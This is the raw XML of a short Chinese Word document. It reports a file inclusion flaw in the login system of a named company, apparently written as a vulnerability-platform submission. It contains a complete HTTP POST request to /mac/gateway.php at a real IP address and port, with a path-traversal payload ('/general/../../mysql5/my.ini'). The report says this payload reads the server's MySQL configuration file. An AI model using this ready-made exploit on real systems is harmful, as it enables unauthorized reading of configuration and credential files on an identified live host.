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78C62" w14:textId="02850C7F" w:rsidR="00313D39" w:rsidRPr="007F2DB6" w:rsidRDefault="007F2DB6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007F2DB6">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>奥德美生物科技(中山)有限公司</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2DB6">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>登陆系统文件包含漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFA2792" w14:textId="1ADC5B5D" w:rsidR="007F2DB6" w:rsidRDefault="007F2DB6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1网站首页</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A9CAEA" w14:textId="44F9C395" w:rsidR="007F2DB6" w:rsidRDefault="007F2DB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3CD104BE" wp14:editId="33DFCF81">
            <wp:extent cx="5274310" cy="26244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11EE2" w14:textId="1F3831F3" w:rsidR="007F2DB6" w:rsidRDefault="007F2DB6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2抓包修改poc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4183331C" w14:textId="77777777" w:rsidR="007F2DB6" w:rsidRDefault="007F2DB6" w:rsidP="007F2DB6">
      <w:r>
        <w:t>POST /mac/gateway.php HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614C95C8" w14:textId="77777777" w:rsidR="007F2DB6" w:rsidRDefault="007F2DB6" w:rsidP="007F2DB6">
      <w:r>
        <w:t>Host: 113.104.3.66:1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521B06FA" w14:textId="77777777" w:rsidR="007F2DB6" w:rsidRDefault="007F2DB6" w:rsidP="007F2DB6">
      <w:r>
        <w:t>User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E77F2E" w14:textId="77777777" w:rsidR="007F2DB6" w:rsidRDefault="007F2DB6" w:rsidP="007F2DB6">
      <w:r>
        <w:t>Content-Length: 45</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59070A29" w14:textId="77777777" w:rsidR="007F2DB6" w:rsidRDefault="007F2DB6" w:rsidP="007F2DB6">
      <w:r>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530ACE31" w14:textId="4056CF33" w:rsidR="007F2DB6" w:rsidRDefault="007F2DB6" w:rsidP="007F2DB6">
      <w:r>
        <w:t>Accept-Encoding: gzip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D57B5A3" w14:textId="77777777" w:rsidR="007F2DB6" w:rsidRDefault="007F2DB6" w:rsidP="007F2DB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49E0FA1D" w14:textId="60950324" w:rsidR="007F2DB6" w:rsidRDefault="007F2DB6" w:rsidP="007F2DB6">
      <w:r>
        <w:t>json={"url":"/general/../../mysql5/my.ini"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD88E8F" w14:textId="1185AAD4" w:rsidR="007F2DB6" w:rsidRDefault="007F2DB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FF74DAC" wp14:editId="3AB725F6">
            <wp:extent cx="5274310" cy="30575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64EB1" w14:textId="30E4BA9E" w:rsidR="007F2DB6" w:rsidRDefault="007F2DB6" w:rsidP="007F2DB6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以查看</w:t>
      </w:r>
      <w:r w:rsidRPr="007F2DB6">
        <w:t>my.ini</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>配置文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D80215" w14:textId="4743A606" w:rsidR="007F2DB6" w:rsidRDefault="007F2DB6" w:rsidP="007F2DB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞存在</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CEAFB8C" w14:textId="1DC10BF1" w:rsidR="007F2DB6" w:rsidRDefault="007F2DB6"/>
    <w:p w14:paraId="11F3ED7A" w14:textId="55EA1B64" w:rsidR="007F2DB6" w:rsidRDefault="007F2DB6"/>
    <w:p w14:paraId="11299C67" w14:textId="0461E36E" w:rsidR="007F2DB6" w:rsidRDefault="007F2DB6"/>
    <w:p w14:paraId="3A5E956E" w14:textId="77777777" w:rsidR="007F2DB6" w:rsidRDefault="007F2DB6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="007F2D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F65DC" w14:textId="77777777" w:rsidR="00F55361" w:rsidRDefault="00F55361" w:rsidP="007F2DB6">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="73CFEB7A" w14:textId="77777777" w:rsidR="00F55361" w:rsidRDefault="00F55361" w:rsidP="007F2D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B761F" w14:textId="77777777" w:rsidR="00F55361" w:rsidRDefault="00F55361" w:rsidP="007F2DB6">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1F963661" w14:textId="77777777" w:rsidR="00F55361" w:rsidRDefault="00F55361" w:rsidP="007F2D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6A4"/>
    <w:rsid w:val="00313D39"/>
    <w:rsid w:val="005126A4"/>
    <w:rsid w:val="007F2DB6"/>
    <w:rsid w:val="00F55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00577D"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{83B80F55-69B9-4EE9-A51D-8DBE0D073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2D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2D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2D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2D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川田</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>川田</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-05-06T03:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-05-06T03:08:00Z</dcterms:modified>
</cp:coreProperties>
</file>